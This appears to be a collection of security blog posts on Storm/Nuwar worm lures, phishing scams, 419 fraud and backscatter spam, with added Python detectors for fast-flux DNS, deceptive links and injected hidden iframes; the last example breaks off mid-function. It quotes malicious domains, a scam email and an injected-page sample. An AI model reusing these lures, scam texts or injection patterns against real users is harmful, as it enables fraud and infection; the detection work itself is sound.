    USA unleashed war on Iran
    War between USA & Iran

    This is not the first time Nuwar has used a war theme. Incidentally, McAfee christened the Storm worm “Nuwar” because it used the sensational theme “Nuclear WAR in USA!” when it first appeared. Since then the authors of Nuwar have used and re-used morbid and shocking themes religiously with every new spam run. These themes sometimes get repeated when that time of the year approaches, and this one is no different: war themes have been seen in previous Storm worm campaigns dating back to Nov 2006 and Apr 2007.

    Storm Worm Bait Page

    Unsuspecting users who follow the link in the spammed email are directed to a Storm bait page hosting a video that purportedly shows the first minutes of World War III. Except that clicking the video downloads “iran_occupation.exe”. And in case a user wanted to know about the advertised Patriots and Veterans Programs, they would end up downloading “Form.exe”. Both files are detected as W32/Nuwar@MM with McAfee’s latest beta DATs.

    The Storm bait pages are currently being hosted on the following fast-flux domains.

    dailydotnews[.]com
    dotdailynews[.]com
    morenewsonline[.]com
    newsworldnow[.]com
    statenewsworld[.]com

    The domain names above have been sanitized in this blog, and readers are strongly advised not to attempt to visit them, as they host a cocktail of exploits that attempt to infect a visiting machine. This information is provided so that administrators can take proactive measures and block access to the rogue domains.
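Fast-flux hosting of the kind used for these bait pages leaves a signature in DNS: very short TTLs, many distinct A records, and an address set that churns between lookups and spans unrelated networks. The Python below is an added example, not from the original post; it scores a sequence of lookups with a simplified version of the features used in published fast-flux detection work (distinct addresses, distinct /16 prefixes, minimum TTL, and churn between consecutive answers). The lookup data is constructed, not real answers for the domains listed above, and a large CDN can look similar on these features, so treat a positive as a lead rather than a verdict.

```python
import ipaddress
from collections import namedtuple

# One DNS lookup: the TTL returned and the A records in the answer.
Lookup = namedtuple("Lookup", "ttl addresses")

# Constructed sequences of A-record answers for one name, as if resolved every
# few minutes. FLUXY imitates a flux network of compromised home machines;
# STABLE imitates an ordinary site. Neither is real data.
FLUXY = [
    Lookup(60, ["71.12.33.4", "98.200.14.77", "24.9.100.3", "190.55.2.18", "85.17.44.201"]),
    Lookup(60, ["71.12.33.4", "62.33.80.9", "201.8.150.2", "89.140.3.77", "24.9.100.3"]),
    Lookup(60, ["115.70.1.9", "201.8.150.2", "178.0.44.12", "71.12.33.4", "94.21.6.6"]),
]
STABLE = [
    Lookup(3600, ["192.0.2.10", "192.0.2.11"]),
    Lookup(3600, ["192.0.2.10", "192.0.2.11"]),
    Lookup(3600, ["192.0.2.11", "192.0.2.10"]),
]

def flux_features(lookups):
    """Summarise a sequence of lookups for one name."""
    ips = set()
    for lk in lookups:
        ips.update(lk.addresses)
    # /16 prefixes stand in for 'distinct networks' without needing ASN data.
    nets16 = {str(ipaddress.ip_network(ip + "/16", strict=False)) for ip in ips}
    # Churn: share of addresses that differ between consecutive answers.
    answers = [set(lk.addresses) for lk in lookups]
    churn = 0.0
    if len(answers) > 1:
        changed = sum(len(a ^ b) for a, b in zip(answers, answers[1:]))
        total = sum(len(a | b) for a, b in zip(answers, answers[1:]))
        churn = changed / total if total else 0.0
    return {
        "distinct_ips": len(ips),
        "distinct_16s": len(nets16),
        "min_ttl": min(lk.ttl for lk in lookups),
        "churn": churn,
    }

def is_fast_flux(lookups, min_ips=5, min_nets=3, max_ttl=300, min_churn=0.3):
    """Heuristic verdict; thresholds are illustrative, tune them on your data."""
    f = flux_features(lookups)
    return (f["distinct_ips"] >= min_ips and f["distinct_16s"] >= min_nets
            and f["min_ttl"] <= max_ttl and f["churn"] >= min_churn)

if __name__ == "__main__":
    for label, data in (("fluxy", FLUXY), ("stable", STABLE)):
        print(label, flux_features(data), "fast-flux" if is_fast_flux(data) else "ok")
```

To use it against a live name, resolve it several times a few minutes apart (respecting the TTL), build one `Lookup` per answer, and feed the list in; the churn figure is what separates a flux network from a site that merely has a few round-robin addresses.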

    The S.P.A.M Experiment Final Report

    On July 1 we released the results of our S.P.A.M (Spammed Persistently All Month) Experiment, in which 50 people from around the world surfed the Web unprotected for 30 days. By taking part in the experiment, participants were given permission to go where most Internet users would not dare, in order to discover how much spam they would attract and what the effects would be. Go everywhere we have told you not to go. Click everything we told you not to click. We then studied the daily blogs and analyzed the spam itself, and confirmed that spammers are as active as ever; they are increasingly using psychological tricks to lure Internet users into parting with their contact details, identity information and cash. The experiment (the first of its kind) clearly shows that spam continues to evolve, utilizing more local languages and cultural nuances, as well as becoming much more targeted in a bid to avoid detection.

    Our brave and bold participants were assembled from 10 countries, and by the end of the 30 days they had received more than 104,000 spam emails: an average of 2,096 messages each, the equivalent of approximately 70 messages a day.

    Many of the spam messages received were phishing emails: emails that pose as a trustworthy source to criminally acquire sensitive information such as usernames, passwords, and bank account details. Other emails carried viruses, and many allowed malware to be silently installed on the computers by persuading participants to surf unsafe web sites. A number of participants noted a decrease in their computer’s processing speed, as well as an increased number of pop-ups.

    The Global ‘Spam League’:

    1. United States 23233
    2. Brazil 15856
    3. Italy 15610
    4. Mexico 12229
    5. United Kingdom 11965
    6. Australia 9214
    7. The Netherlands 6378
    8. Spain 5419
    9. France 2597
    10. Germany 2331

    To read more about the participants’ experiences, go here, and make sure you download the ‘Global Spam Diaries’ as well.

    Yet another Paypal phishing scam

    We often read that scam and phishing attacks are getting more and more complex. I agree… if we deliberately omit the various phishing kits available on the internet, which are usually not very sophisticated! This weekend I got yet another phishing email on my personal address. This one targets PayPal users, specifically PayPal France, since it is written in French. I thought it would be a perfect example to dissect in order to highlight the suspicious parts of its content.

    So here is the email body:

    First thing to notice: the use of “Cher client Paypal”, which means roughly “Dear Paypal member” and is a formal, but also very non-specific, way to start a mail. PayPal always uses our real name at the beginning of its mails, so any email that appears to be sent from PayPal and starts with such a generic salutation is suspicious. Moreover, we use accents in French, and although the mail is written in French there is no accent at all. Worse, there are many grammatical errors. PayPal is a big company, and I find it highly unlikely that they don’t have people who can write French properly! So just reading the email body should be enough to make us drop it in the trash.

    But let’s see the subtler parts now.

    The email asks us to click on the button “Activer” in order to re-activate our PayPal account (which, obviously, was never deactivated). But as you can see in the following screenshot, the button does not point to the Paypal.fr website; it is linked to the domain falomensdepeyy.com, although “www.paypal.fr” appears in the URL in an attempt to confuse people. A very typical tactic!
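The mismatch between what a link shows and where it really goes is mechanical to detect. The Python below is an added example, not part of the original post: it pulls the real host out of the href and reports a user-info section before “@”, a visible URL whose host differs from the actual one, and a brand name that appears in the link while the registrable domain belongs to someone else. The sample URLs are constructed in the shape the post describes (the exact phishing URL is not reproduced here), and the registrable-domain rule is a simplification of what the Public Suffix List would give.

```python
from urllib.parse import urlsplit

def host_of(url):
    """Hostname the browser will actually connect to (lower-case, no trailing dot)."""
    return (urlsplit(url).hostname or "").lower().rstrip(".")

def registrable(host):
    """Last two labels; a production check should use the Public Suffix List."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host

def analyze_link(href, display_text, brand_domains):
    """Return the reasons an anchor looks deceptive, or [] if nothing was found.

    href          -- the real target from the <a> element
    display_text  -- what the reader sees (button label or a URL-looking string)
    brand_domains -- registrable domains the mail claims to come from
    """
    reasons = []
    parts = urlsplit(href)
    host = host_of(href)

    # http://www.brand.tld@evil.example/ : everything before '@' is user-info.
    if parts.username is not None:
        reasons.append("userinfo before '@' hides the real host")
    if parts.scheme.lower() not in ("http", "https"):
        reasons.append("unexpected scheme %r" % parts.scheme)

    # Visible URL text that names a different host than the href.
    shown = display_text.strip().lower()
    if shown.startswith(("http://", "https://")):
        shown_host = host_of(shown)
        if shown_host and shown_host != host:
            reasons.append("visible URL host %s differs from real host %s"
                           % (shown_host, host))

    # Brand present as a sub-label, path or user-info, but not as the owner.
    for brand in brand_domains:
        brand = brand.lower()
        if registrable(host) == brand:
            continue                       # genuinely the brand's own domain
        if brand in href.lower() or brand in shown:
            reasons.append("brand %s appears in link but real domain is %s"
                           % (brand, registrable(host)))
            break
    return reasons

if __name__ == "__main__":
    # Constructed examples only; the real phishing URL is not reproduced.
    for href, text in [
        ("https://www.paypal.fr/cgi-bin/webscr", "Activer"),
        ("http://www.paypal.fr.falomensdepeyy.com/activer", "Activer"),
        ("http://www.paypal.fr@falomensdepeyy.com/", "https://www.paypal.fr/"),
    ]:
        print(href, "->", analyze_link(href, text, ["paypal.fr"]) or ["looks consistent"])
```

Run this over every `<a href>` in an incoming HTML mail and the “Activer” button in this message is flagged on the brand-as-subdomain rule alone; the other two rules catch the older “@” trick and the case where the anchor text is itself a fake URL.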

    And last, but not least, let’s look at the email header:

    The content of the header “X-WEBC-Mail-From-Script” shows that this email was sent by a script located at http://www.alkasterdesese.com/mailer1.php, which has nothing to do with PayPal’s website! Although the “From” field contains the correct sender “service@paypal.fr”, we are now sure that this email did not come from PayPal.

    At the time of writing, both sites located at alkasterdesese.com and falomensdepeyy.com are shut down.

    Additionally, Michael Barrett from PayPal has posted an excellent blog on how to spot scams.

    Breaking News… NOT!

    There mustn’t be much going on in the world today as the Nuwar spammers have moved from jumping on real news of natural disasters and current affairs to creating their own fictional events! This high volume spam campaign is using some wacky subjects to lure people into clicking on the links:

    Subject: Britney found hanged in locker room
    Subject: White House hit by lightning, catches fire
    Subject: Oprah found sleeping the streets
    Subject: Eiffel Tower damaged by massive earthquake
    Subject: Donald Trump missing, feared kidnapped
    Subject: Lastest! Obama quits presidential race

    This clever social engineering technique plays on people’s curiosity about natural disasters and celebrities. The emails also follow the simple format of some text and a link that looks fairly harmless to the uneducated user.

    All the links go to a fake PornoTube page hosted on legitimate sites that have been hacked. If you click on the video (which is actually just an image) it tries to download a .exe file. This is detected as BackDoor-DNM, and the spam is also currently detected by our Anti-Spam products.

    So it goes without saying: NEVER click on links in an email unless you are sure of its origin, keep your anti-virus software up to date, and if you have a website make sure it’s properly secured so you’re not hosting stuff like this.

    Nuwar circulating a fake topic – Beijing earthquake

    Nuwar families are known for using social engineering to trick users into downloading them. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic: a Beijing earthquake (not the Sichuan earthquake!).

    If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click it: the page contains an injected iframe that loads malicious JavaScript.

    Upon accessing the page, the obfuscated JavaScript is downloaded and run because of the injected iframe. The JavaScript exploits the RealPlayer vulnerability CVE-2008-1309 and downloads another variant of Nuwar. McAfee VSE blocks the script and detects it as “JS/Exploit-Shell.gen”.
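Pages compromised this way usually carry two tell-tales: an iframe sized or styled to be invisible, and a script body that decodes a string and hands it to eval. The Python below is an added example, not from the original post or from McAfee; it flags both patterns in a constructed HTML fragment (the hostname counter.example and the percent-encoded string are made up). It is a triage filter for a page you have already fetched, not a replacement for running the script in an analysis sandbox.

```python
import re

# Constructed page fragment in the shape the post describes: a normal-looking
# bait page with an injected, invisible iframe and an eval/unescape script.
SAMPLE_HTML = """
<html><body>
<h1>Beijing earthquake: first video</h1>
<a href="beijin.exe"><img src="video.jpg" alt="play"></a>
<iframe src="http://counter.example/in.cgi?3" width="1" height="1" style="visibility:hidden"></iframe>
<script>eval(unescape("%76%61%72%20%61%3d%31%3b%76%61%72%20%62%3d%32%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%61%2b%62%29%3b"));</script>
</body></html>
"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*("([^"]*)"|'([^']*)'|([^\s>]+))""")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)

def attrs(tag_body):
    """Attribute name -> value for the inside of one tag (quotes stripped)."""
    out = {}
    for m in ATTR_RE.finditer(tag_body):
        out[m.group(1).lower()] = m.group(3) or m.group(4) or m.group(5) or ""
    return out

def _tiny(value):
    """True for a width/height of 0, 1 or 2 (optionally with a 'px' suffix)."""
    if value is None:
        return False
    digits = value.strip().lower().rstrip("px").strip()
    return digits.isdigit() and int(digits) <= 2

def suspicious_iframes(html):
    """[(src, reasons)] for iframes that are effectively invisible."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        a = attrs(m.group(1))
        reasons = []
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("near-zero size")
        style = a.get("style", "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden via CSS")
        if reasons:
            hits.append((a.get("src", ""), reasons))
    return hits

def suspicious_scripts(html):
    """[(first 40 chars, reasons)] for inline scripts that eval decoded data."""
    hits = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        reasons = []
        if (re.search(r"\beval\s*\(", body)
                and re.search(r"\bunescape\s*\(|fromCharCode", body)):
            reasons.append("eval of decoded string")
        if len(re.findall(r"%[0-9a-fA-F]{2}", body)) >= 20:
            reasons.append("long percent-encoded blob")
        if reasons:
            hits.append((body[:40], reasons))
    return hits

if __name__ == "__main__":
    print(suspicious_iframes(SAMPLE_HTML))
    print(suspicious_scripts(SAMPLE_HTML))
```

The thresholds (2 pixels, 20 encoded bytes) are deliberate guesses; a hidden iframe is worth a look on its own, but the combination of an invisible frame and an eval of decoded text on the same page is what usually marks an injection rather than a clumsy advertiser.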

    At the time of writing, the download file was corrupted.

    Phishing & Vishing takedown best practices

    There has been some debate in anti-phishing circles over what a hosting service provider should do when taking down a phishing site. It boils down to one of three basic actions the victims witness.

    • Redirect the hits to the brand’s legitimate site – This, in my opinion, is a dangerous thing to do on many levels, and any brand requesting this action will feature in a follow-up shortly.
    • Remove the site and throw a 404 error – Just stopping the site working and having the browser present a standard error is the standard check-box reaction and the minimal effort.
    • Use the hit as an opportunity for education – This is by far my favored option (even though I’ll play devil’s advocate when it’s discussed). Once a victim has fallen for a phish email, help them to help themselves in the future with some easy-to-understand education.

    Education has to be appropriate; I’m not suggesting “click time” is a good time to present the user with the Anti-Phishing Phil game, for instance (Phil is great, though, if you’ve never seen it). “In your face” education at click time is a topic close to the heart of the APWG, and they will present their advice on it very soon.

    So back to the raison d’être of this blog: a 10-gallon hat tip to AT&T for this great vishing takedown. [Listen to the mp3]*. They’ve raised the bar with this one and deserve some hearty kudos. I can’t think of a better way of dealing with a vishing number. The continuous unavailable tone has no place here, since it’s easily confused with mis-dialing (Homer mp3). They have replaced the disconnected service with a great education statement, and sound advice too if the caller thinks they were a victim.

    * The quality is much better on the phone, I used our conference bridge to record the example.

    This is not a phishing site. Now, be a good victim and enter your login credentials in the form!

    A few days ago I was browsing a forum when I read a message from someone saying he had received a strange link from one of his MSN contacts, of the following form:

    http://[MSN_login].flatl1n[removed].info

    This domain hosts a webpage asking for MSN logins and passwords and pointing to another webpage asking for ICQ login credentials:

    But let’s examine this page in detail, especially the “Terms of Use”:

    “Terms of Use / Privacy Policy:

    By filling out this form, you authorize TST Management, Inc to spread the word about this 100% real and upcomming Messenger Community Site.
    You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.

    We do not share your private information with any third parties.
    By using our service/website you hereby fully authorize TST Management, Inc to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us. This is not a “phishing” site that attempts to “trick” you into revealing personal information. Everything we do with your information is disclosed here. If you are under eighteen (18), you MUST obtain permission from a parent or guardian before using our website/service.

    This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

    ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT, DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.

    We may temporarily access your MSN account to do a combination
    of the following:
    1. Send Instant Messages to your friends promoting this site.
    2. Introduce new entertaining sites to your friends via Instant Messages.”

    Oh well, that reminds me how powerful social engineering is…
    The victim received this URL from what is supposed to be one of his MSN contacts, and it is unlikely he will spend a few minutes reading those lines. So I agree, everything that the attackers do is published inside the Privacy Policy, but I disagree when they say that they don’t “trick” people to get their login credentials: they use social engineering attacks to get users’ passwords, this is dishonest and it is a phishing scam!!

    Now, here is the funny part of the “Terms of Use”:

    “This is a free service. You will not be asked to pay at any time.
    You will not be subscribed to anything asking for payment.
    This service is made possible by many hours of human effort.

    TST Management, Inc reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference.”

    So ironic…
    And the last part, the one that aroused my curiosity:

    “You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. You also understand that by temporarily accessing your msn account, TST Management, Inc is NOT agreeing to MSN’s terms of use and therefore not bound by them.

    This agreement shall be construed and governed by the law of the republic of Panama. You expressly consent to the exclusive venue and personal jurisdiction of the courts located in the Republic of panama for any actions arising from or relating to this agreement.

    If any provision of this agreement is held to be invalid, illegal or unenforceable for any reason, such invalidity, illegality or unenforceability shall not effect any other provisions of this agreement, and this agreement shall be construed as if such invalid, illegal or unenforceable provision had not been contained herein.

    Copyright 2008 TST Management, Inc”

    I was wondering whether this website was really hosted in the Republic of Panama, but a whois of the domain showed that the IP address is actually located in Hong Kong:

    The Reverse IP field says there are 32 other sites hosted on this server (210.56.53.224).
    We can also see that “TST Management, Inc” (the registrant of the domain) owns 412 other domains.
    So I decided to do a Google search, and I wasn’t surprised to notice that they are apparently used for phishing scams!
    “TST Management, Inc” seems to be another name for the “Blue China Group Ltd”, the one that was sued by MySpace last year for mass spamming.

    I managed to capture a screenshot of the old “Mass Comment Poster” website that belonged to them:

    We can see that the Terms of use were very cynical too!!

    They also host what they introduce as a MySpace tracker (called “Stalker Tracker”) which is in fact another phishing scam website:

    Besides, the website displays another “typical” Privacy Policy mentioning:

    We may temporarily access your MySpace account to do a combination
    of the following:
    1. Post bulletins to your friends promoting stalkertrack.com.
    2. Post comments to your friends promoting stalkertrack.com.
    3. Post a blog about our upcoming tracker for your friends to read.
    4. Customize your blog header html with a clickable stalkertrack.com ad image.
    5. Send a batch of blog invites on your behalf.
    6. Send IM invites with a personalized stalkertrack.com message and/or image advertisement attached – to your friends and potential friends and other members.
    7. Introduce new entertaining sites to your friends via comments, bulletins, and messages

    And guess how they can do that? Once again, just by using the login credentials entered in the form…

    Last but not least, once the login credentials are submitted via the phishing scam MSN/ICQ web pages, a PHP script is called to increment an online counter, and here are the statistics available at the moment:

    This counter seems to track the activity on all their phishing websites, not just a couple of them.

    We can see that 92 people were on one of their phishing websites when I looked at the statistics; there were 35334 unique visitors yesterday, 284746 visitors since the beginning of June, 3616516 visitors last month, and 7031582 visitors since this counter was created (in February/March 2008, according to the second screenshot).

    Be wary of such IM messages and of websites marked “copyright” to “Blue China Group, Ltd” or “TST Management, Inc”. Whatever the website purports to be, they are certainly requesting your login credentials in an unclear way!!

    CeCOS II – Co-operation and Education is Key

    I was at the APWG CeCOS II conference in Akasaka, Tokyo, Japan for the last two days. It was encouraging to see many attendees not only from academia, security vendors and anti-phishing groups, but also from many law enforcement agencies, including Interpol and the Kyoto Prefecture Police amongst others. There were also several presenters from the online gaming community.

    Having such a diverse turnout certainly helps push greater awareness of a multitude of cybercrime issues. It was very encouraging to see everyone agreeing on better co-operation in shutting down rogue sites, tracking the bad guys and protecting users. There was also a video crew from NHK there to bring the CeCOS message to Japanese TV viewers.

    Dr. Uchida-san from The Institute of Information Security and Steve Sheng from Carnegie Mellon University (CMU) also presented a different angle on the issue, from the psychological and educational aspects. Both complement the policy and technology countermeasures.

    Shinsuke Honjo and I gave a presentation on Monday to highlight how malware authors are now going all out to attack victims from all cultures. They can craft spam, phishing sites or malware to target diverse cultures and groups of Internet users in the Asia Pacific region. It was interesting for us to have our research corroborated by data from other speakers at the event. Terence Park, a researcher from KrCERT/CC, in particular demonstrated how a Korean document viewer was used as bait to install a password stealer. This was another classic example of how malware authors can use different localized techniques to get their victims.

    Overall, the message that was consistent throughout was: co-operation and education. In tackling a global issue like cybercrime, both are important factors, not only in tracking and prosecuting the criminals but also in better protecting Internet businesses and users.

    ICANN slaps registrars who help criminals

    It’ll come as no surprise that there are a bunch of domain registrars that are effectively supporting criminal gangs by not acting on reports of domains run for evil deeds and criminal activities. (Or as we say: They don’t wear a glowing white hat!)

    I was chatting on email with Garth Bruen from KnujOn the other day, and we agreed that it’s been well known for a long time in the industry that certain registrars are “black hat”. He questioned what was being done about it and pointed me at a story they had worked on with the Washington Post about their top ten, documented here: http://www.knujon.com/registrars/#the_list.

    For a different data source (and one that looks very much like our own ;) ) URIBL’s “hall of shame” has been on line for ages and can be viewed here: http://rss.uribl.com/nic/

    I don’t take these things at face value, but I’ve been aware of this issue for a couple of years and have even stood up at an APWG conference and shaken my finger at the registries and registrars in the room after an early presentation on double-flux, making sure they knew that only they could help fight it.

    Well, it looks like Garth’s article and PR worked: the wheels of power at ICANN have turned and they have told the worst registrars to act!

    So my hat tip for the month of May has to go to Garth, Cool.. Nice one… and congratulations!

    ICANN states:

    “But if those registrars, including those publicly cited, do not investigate and correct alleged inaccuracies reported to ICANN, our escalation procedure can ultimately result in ICANN terminating their accreditation and preventing them from registering domain names,”

    I suspect however that the “inaccuracies” relate to the accuracy of whois information and if that is the case I suspect that the registrars will simply start their own privacy services.

    NB: Privacy and anonymity are different things if you’re a LEA (Law Enforcement Authority) within your jurisdiction, but to me, the humble lower middle-class sysadmin (Hi @SRS), and to those outside of their primary jurisdiction, they are effectively the same impenetrable barrier. We repute against domains registered with privacy services because, statistically speaking (in the filtering-metric-truck-loads-of-email world), they are used as anonymity services more than privacy services.

    Competition time: Just for fun, I’m going to open a book on the first registrar to expire date and put a black McAfee Baseball Cap up for grabs. (We engineers don’t get much SWAG, let alone give it away). Just leave a message with the registrar you think will stop trading (or be disaccredited by ICANN) first and the date you think they will be gone on.

    Employees of McAfee, KnujOn and ICANN need not apply, I’m the judge and my decision is final!

    Final thoughts: All we need now is for a few of the heavily abused ccTLDs to do the same and dive into the fight before we see more of these.

    National Postcode Lottery, Twisted 419 scam

    In the United Kingdom the term “Postcode Lottery” refers to situations where public services are available to certain postal districts where these districts are carved up by government authorities according to the first 4 characters of the post code (Our equivalent of the American Zip code*). In densely populated areas it is entirely possible for one end of a street to be lucky in a postcode lottery and the other end to be unlucky.

    So, postcode lotteries in the UK are generally bad news. They always get press attention. For instance, National Health Service (NHS) local trusts will provide a superior premium drug in one area but not in another, creating what is known as a postcode lottery. Prescription charges are another good example.

    The remote money fraudsters are taking a very different view!
    According to the bottom-feeders a Postcode Lottery is a competition you can win!

    Sample below from my Yahoo account. Notice the rotten spelling and the possible macro replacement issues; incidentally, we call these PBCAK issues internally (Problem Between Chair And Keyboard) ;)

    Subject: National Postcode Lottery

    National Postcode Lottery

    Attention:-

    Winner We bring to your notice the winning letter from Nationale Postcode Lottery {United Kingdom Promotion Company} held on the 8th of May, 2008 through Internet ballot System among 10,000 Microsoft users.Subsequently, your email address attached to ticket number 24.2.6.37.15.45 won contract sum of 800,000.00 Pounds ,winning number 100364,ref number XX/0999/171ESP and BATCH: 1211504/MIU.

    We request you to pay serious attention to this notification by contacting the claims department with claim information and procedures of claim.

    Mr.Jose Bolton
    Tel: +44-871-nnn-0525
    Fax: +44-700-nnn-0445
    Email:divineagent@sify.com

    Congratulations once again from our members of staff and thank you for being part of our promotional program.

    Yours Sincerely,
    Mrs. Stefian Smith
    National Postcode Lottery

    —————————————————————–
    Find the home of your dreams with eircom net property
    Sign up for email alerts now [advert removed]

    Hardly a political issue, I’m sure you’ll agree. 419 plain and simple. But we’ve seen that email address a lot recently. Time for a good old fashioned LART’ing!

    *The full 7 character UK postal code is very accurate, it refers to the handful of mail a postie can deliver, approximately 10 houses or thereabouts.

    Beware of Spear Phishing by ‘U.S. Tax Court’

    A highly targeted spear phishing campaign is currently doing the rounds. Executives–including some of our own at McAfee–have received emails purportedly from the U.S. Tax Court. The emails are designed to look like a petition from the Tax Court and are fairly believable, with domains similar to the legitimate ustaxcourt.gov in the “from” address and links. There’s also a legitimate telephone number for the organisation. The executive’s name is listed as the respondent in a case versus the Commissioner of Internal Revenue.

    The scammers do their homework when it comes to spear phishing. Instead of pumping out millions of emails to anybody and everybody, spear phishers send out their scams only to people they know will be susceptible to the scam. In this case a top executive–rather than the average employee–is much more likely to be involved in a court case of this nature.

    Clicking on the link may result in malicious code such as keyloggers being installed on your system.

    The U.S. Tax Court currently has the following notice on its web site:

    “The United States Tax Court has received many telephone calls regarding an e-mail which purports to originate from the Court being sent by a member of the Tax Court’s practitioner bar. This message is an example of “Spear Phishing,” which is an e-mail spoofing attempt that targets a specific organization. The Tax Court is not disseminating any e-mail notice to anyone who currently has a case before this Court.”

    More Crimeware Arrests

    This week’s news brings another report about arrests of people involved with Crimeware. This story is particularly notable due to the large number of individuals being charged, and because it’s been jointly announced by U.S. and Romanian authorities. Many people involved with gathering information on and prosecuting online criminals have complained about the lack of cooperation from certain countries, but this certainly shows that progress is being made in that arena.

    One thing I thought was especially interesting in the report was the description of the process that was allegedly being used by the people involved:

      According to the indictment, the Romania-based members of the enterprise obtained thousands of credit and debit card accounts and related personal information by phishing, with more than 1.3 million spam emails sent in one phishing attack. Once directed to a bogus site, victims were then prompted at those sites to enter access device and personal information. The Romanian “suppliers” collected the victims’ information and sent the data to U.S.-based “cashiers” via Internet chat messages. The domestic cashiers used hardware called encoders to record the fraudulently obtained information onto the magnetic strips on the back of credit and debit cards, and similar cards such as hotel keys. Cashiers then directed “runners” to test the fraudulent cards by checking balances or withdrawing small amounts of money at ATMs. The cards that were successfully tested, known as “cashable” cards, were used to withdraw money from ATMs or point-of-sale terminals that the cashiers had determined permitted the highest withdrawal limits. A portion of the proceeds was then wired to the supplier who had provided the access-device information.

    This strikes me as a wonderful illustration of the resources that are now being put into the process by criminals. This isn’t a simple operation with some lone kid in his basement; this involves a network of people gathering information and testing, and relatively expensive card-writer hardware.

    Are You Relaying NDR Spam?

    NDR spam, a.k.a. backscatter, has been around for years but has only recently hit the radar as a major spam issue, mainly due to the rise of the botnet and spammers’ desperation to get messages through to the end user.

    What is an NDR?
    NDR, short for Non-Delivery Receipt, is an automated email sent by an MTA that informs the sender that there has been a problem with the delivery of the message they have sent.

    NDRs are also referred to as Delivery Status Notifications (DSN) or simply bounce messages.

    So what is NDR Spam?
    NDR Spam occurs when spammers fake your email address in the From field when sending their spam. If the intended recipient of the spam does not exist or has no space left in their inbox etc. then you’ll receive a Non Delivery Receipt for an email you never actually sent.

    Also contributing to this problem are Challenge/Response spam filtering services, Out Of Office notifications, list auto-replies and any other auto-responder type email.

    Why has it become a problem?
    Spammers are constantly looking for ways to evade anti-spam filters. The recent sharp rise in NDR spam suggests that rather than just having some bad email addresses on their lists that bounce, they have started to target email addresses that bounce in order to get their spam content through to your inbox. They can do this by using totally random email addresses but with a legitimate domain that is destined to bounce or they can compile lists of email addresses that bounce when spammed. It’s even possible the spammers are targeting domains that they know return bounces with the full message attached. Basically the spammer wants to relay his spam via a legitimate mail server to get it in your inbox even if it doesn’t look pretty.

    How big is the problem?
    NDR spam is currently about 2% of all spam, down from over 4% a couple of weeks ago. It’s possible this method hasn’t been effective enough for the spammers. We believe that over 50% of these bounces are coming from one botnet alone. NDR spam can be broken down into three main categories: an NDR with the full message attached, an NDR with only the spammy headers attached, or an NDR with no spam content at all.

    Detecting NDR Spam
    There are several problems associated with detecting this particular type of spam.

  • An NDR is technically a legitimate email coming from a legitimate mail server. This means that detecting this type of spam becomes more difficult.
  • Some NDRs have no spam content attached in the message, so there is no way to differentiate these from legitimate NDRs using traditional content filtering methods.
  • Challenge/Response emails cannot be blocked for obvious reasons.
  • Each MTA has a different format of NDR, making them difficult to detect.

    The good news…

  • Currently more than 95% of all NDR spam contains some spam content that we can use to identify and block these messages using traditional content filtering. We are detecting the vast majority of this spam already and are working hard to catch all of it. In the meantime we have introduced a rule that customers can turn on to block all NDRs if they are having an issue with it.
  • We are also investigating the implementation of Bounce Address Tag Validation (BATV) in our products. This is a method for determining whether the bounce address specified in an email is valid. It is designed to reject bounce messages sent to forged return addresses.

    Reducing Outbound NDR Spam
    Reducing the number of NDRs sent by your server would also help this situation, with the added benefit of reducing the load on your server.

    There are two types of bounce: synchronous and asynchronous. A synchronous bounce occurs when the remote mail server rejects the message during the SMTP conversation. This helps reduce load on your server by saving it from having to send an NDR. Unfortunately this can open your server up to dictionary attacks, but there are solutions to that issue, such as tarpitting. An asynchronous bounce happens when the remote mail server accepts the message and later decides there is a problem with delivery, so it returns it by sending an NDR to the return path of the message. I would recommend using synchronous bouncing if it is a feature of your mail server.

    We could suggest that all responsible administrators should leave the original message in their NDRs, making it much easier to identify and block these messages with existing anti-spam technologies, but on the flip side, if no NDR messages had the spam content in them then it wouldn’t be worth the spammers’ while sending them. Each approach has its advantages and disadvantages.
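    The BATV idea mentioned above (sign your own outbound return path, then refuse asynchronous bounces that arrive for an address you never signed) is easy to show in code. The following is an added example and not McAfee product code; it assumes a simplified layout modelled on the draft’s “prvs” form (a one-digit key id, a three-digit expiry day counter and six hex characters of an HMAC, all placed in the local part), uses HMAC-SHA256 rather than the draft’s SHA-1, and uses a constructed secret key. A forged or unsigned return path on a bounce (empty MAIL FROM) is rejected; ordinary mail is untouched.

```python
import hmac
import hashlib
import time

# Constructed demo secret; a real deployment keeps a per-server key out of source.
BATV_KEY = b"constructed-demo-key-not-for-production"
DAY = 86400
TAG_PREFIX = "prvs="          # tag name used by the BATV draft's "prvs" scheme


def _day_number(now):
    return int(now // DAY)


def _mac(key, expiry_field, address):
    # Six hex chars of an HMAC over (expiry day, original address).
    # The layout is an assumption for this example, not any product's scheme.
    msg = f"{expiry_field}{address}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()[:6]


def sign_return_path(address, key=BATV_KEY, now=None, days_valid=7):
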